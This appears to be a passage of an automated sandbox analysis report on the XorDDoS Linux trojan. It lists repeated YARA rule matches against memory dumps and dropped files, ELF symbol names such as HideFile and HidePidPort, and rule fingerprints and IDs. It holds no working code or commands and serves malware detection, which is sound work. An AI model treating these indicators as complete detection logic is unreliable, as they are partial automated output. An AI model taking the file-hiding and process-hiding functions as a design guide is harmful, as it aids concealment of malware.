Source: 6532.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6532.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6375.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6375.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6375.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6375.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6375.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6375.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6550.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown

Source: HaJTqGiPpD	ELF static info symbol of initial sample: HideFile
Source: HaJTqGiPpD	ELF static info symbol of initial sample: HidePidPort
Source: HaJTqGiPpD	ELF static info symbol of initial sample: __after_morecore_hook
Source: HaJTqGiPpD	ELF static info symbol of initial sample: __free_hook
Source: HaJTqGiPpD	ELF static info symbol of initial sample: __libc_register_dl_open_hook
Source: HaJTqGiPpD	ELF static info symbol of initial sample: __libc_register_dlfcn_hook
Source: HaJTqGiPpD	ELF static info symbol of initial sample: __malloc_hook
Source: HaJTqGiPpD	ELF static info symbol of initial sample: __malloc_initialize_hook
Source: HaJTqGiPpD	ELF static info symbol of initial sample: __memalign_hook
Source: libudev.so.17.dr	ELF static info symbol of dropped file: HideFile
Source: libudev.so.17.dr	ELF static info symbol of dropped file: HidePidPort
Source: libudev.so.17.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: libudev.so.17.dr	ELF static info symbol of dropped file: __free_hook
Source: libudev.so.17.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: libudev.so.17.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: libudev.so.17.dr	ELF static info symbol of dropped file: __malloc_hook
Source: libudev.so.17.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: libudev.so.17.dr	ELF static info symbol of dropped file: __memalign_hook
Source: kigdktzeum.17.dr	ELF static info symbol of dropped file: HideFile
Source: kigdktzeum.17.dr	ELF static info symbol of dropped file: HidePidPort
Source: kigdktzeum.17.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: kigdktzeum.17.dr	ELF static info symbol of dropped file: __free_hook
Source: kigdktzeum.17.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: kigdktzeum.17.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: kigdktzeum.17.dr	ELF static info symbol of dropped file: __malloc_hook
Source: kigdktzeum.17.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: kigdktzeum.17.dr	ELF static info symbol of dropped file: __memalign_hook
Source: mizdkrdyqj.17.dr	ELF static info symbol of dropped file: HideFile
Source: mizdkrdyqj.17.dr	ELF static info symbol of dropped file: HidePidPort
Source: mizdkrdyqj.17.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: mizdkrdyqj.17.dr	ELF static info symbol of dropped file: __free_hook
Source: mizdkrdyqj.17.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: mizdkrdyqj.17.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: mizdkrdyqj.17.dr	ELF static info symbol of dropped file: __malloc_hook
Source: mizdkrdyqj.17.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: mizdkrdyqj.17.dr	ELF static info symbol of dropped file: __memalign_hook
Source: becqudbgme.17.dr	ELF static info symbol of dropped file: HideFile
Source: becqudbgme.17.dr	ELF static info symbol of dropped file: HidePidPort
Source: becqudbgme.17.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: becqudbgme.17.dr	ELF static info symbol of dropped file: __free_hook
Source: becqudbgme.17.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: becqudbgme.17.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: becqudbgme.17.dr	ELF static info symbol of dropped file: __malloc_hook
Source: becqudbgme.17.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: becqudbgme.17.dr	ELF static info symbol of dropped file: __memalign_hook
Source: sxruomujjd.17.dr	ELF static info symbol of dropped file: HideFile
Source: sxruomujjd.17.dr	ELF static info symbol of dropped file: HidePidPort
Source: sxruomujjd.17.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: sxruomujjd.17.dr	ELF static info symbol of dropped file: __free_hook
Source: sxruomujjd.17.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: sxruomujjd.17.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: sxruomujjd.17.dr	ELF static info symbol of dropped file: __malloc_hook
Source: sxruomujjd.17.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: sxruomujjd.17.dr	ELF static info symbol of dropped file: __memalign_hook
Source: qrabekbstr.17.dr	ELF static info symbol of dropped file: HideFile
Source: qrabekbstr.17.dr	ELF static info symbol of dropped file: HidePidPort
Source: qrabekbstr.17.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: qrabekbstr.17.dr	ELF static info symbol of dropped file: __free_hook
Source: qrabekbstr.17.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: qrabekbstr.17.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: qrabekbstr.17.dr	ELF static info symbol of dropped file: __malloc_hook
Source: qrabekbstr.17.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: qrabekbstr.17.dr	ELF static info symbol of dropped file: __memalign_hook
Source: sotpizdssr.17.dr	ELF static info symbol of dropped file: HideFile
Source: sotpizdssr.17.dr	ELF static info symbol of dropped file: HidePidPort
Source: sotpizdssr.17.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: sotpizdssr.17.dr	ELF static info symbol of dropped file: __free_hook
Source: sotpizdssr.17.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: sotpizdssr.17.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: sotpizdssr.17.dr	ELF static info symbol of dropped file: __malloc_hook
Source: sotpizdssr.17.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: sotpizdssr.17.dr	ELF static info symbol of dropped file: __memalign_hook
Source: gnmftoxpza.17.dr	ELF static info symbol of dropped file: HideFile
Source: gnmftoxpza.17.dr	ELF static info symbol of dropped file: HidePidPort
Source: gnmftoxpza.17.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: gnmftoxpza.17.dr	ELF static info symbol of dropped file: __free_hook
Source: gnmftoxpza.17.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: gnmftoxpza.17.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: gnmftoxpza.17.dr	ELF static info symbol of dropped file: __malloc_hook
Source: gnmftoxpza.17.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: gnmftoxpza.17.dr	ELF static info symbol of dropped file: __memalign_hook
Source: iulapzbfpq.17.dr	ELF static info symbol of dropped file: HideFile
Source: iulapzbfpq.17.dr	ELF static info symbol of dropped file: HidePidPort
Source: iulapzbfpq.17.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: iulapzbfpq.17.dr	ELF static info symbol of dropped file: __free_hook
Source: iulapzbfpq.17.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: iulapzbfpq.17.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: iulapzbfpq.17.dr	ELF static info symbol of dropped file: __malloc_hook
Source: iulapzbfpq.17.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: iulapzbfpq.17.dr	ELF static info symbol of dropped file: __memalign_hook
Source: posifzmmhg.17.dr	ELF static info symbol of dropped file: HideFile
Source: posifzmmhg.17.dr	ELF static info symbol of dropped file: HidePidPort
Source: posifzmmhg.17.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: posifzmmhg.17.dr	ELF static info symbol of dropped file: __free_hook
Source: posifzmmhg.17.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: posifzmmhg.17.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: posifzmmhg.17.dr	ELF static info symbol of dropped file: __malloc_hook
Source: posifzmmhg.17.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: posifzmmhg.17.dr	ELF static info symbol of dropped file: __memalign_hook
Source: buxftyvhwp.17.dr	ELF static info symbol of dropped file: HideFile
Source: buxftyvhwp.17.dr	ELF static info symbol of dropped file: HidePidPort
Source: buxftyvhwp.17.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: buxftyvhwp.17.dr	ELF static info symbol of dropped file: __free_hook
Source: buxftyvhwp.17.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: buxftyvhwp.17.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: buxftyvhwp.17.dr	ELF static info symbol of dropped file: __malloc_hook
Source: buxftyvhwp.17.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: buxftyvhwp.17.dr	ELF static info symbol of dropped file: __memalign_hook
Source: wvbxepjyjx.17.dr	ELF static info symbol of dropped file: HideFile
Source: wvbxepjyjx.17.dr	ELF static info symbol of dropped file: HidePidPort
Source: wvbxepjyjx.17.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: wvbxepjyjx.17.dr	ELF static info symbol of dropped file: __free_hook
Source: wvbxepjyjx.17.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: wvbxepjyjx.17.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: wvbxepjyjx.17.dr	ELF static info symbol of dropped file: __malloc_hook
Source: wvbxepjyjx.17.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: wvbxepjyjx.17.dr	ELF static info symbol of dropped file: __memalign_hook
Source: eqznayducj.17.dr	ELF static info symbol of dropped file: HideFile
Source: eqznayducj.17.dr	ELF static info symbol of dropped file: HidePidPort
Source: eqznayducj.17.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: eqznayducj.17.dr	ELF static info symbol of dropped file: __free_hook
Source: eqznayducj.17.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: eqznayducj.17.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: eqznayducj.17.dr	ELF static info symbol of dropped file: __malloc_hook
Source: eqznayducj.17.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: eqznayducj.17.dr	ELF static info symbol of dropped file: __memalign_hook

Source: HaJTqGiPpD, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: HaJTqGiPpD, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: HaJTqGiPpD, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: HaJTqGiPpD, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: HaJTqGiPpD, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: HaJTqGiPpD, type: SAMPLE	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: HaJTqGiPpD, type: SAMPLE	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6233.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6233.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6233.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6233.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6233.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6233.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6512.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6512.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6512.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6512.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6512.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6512.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
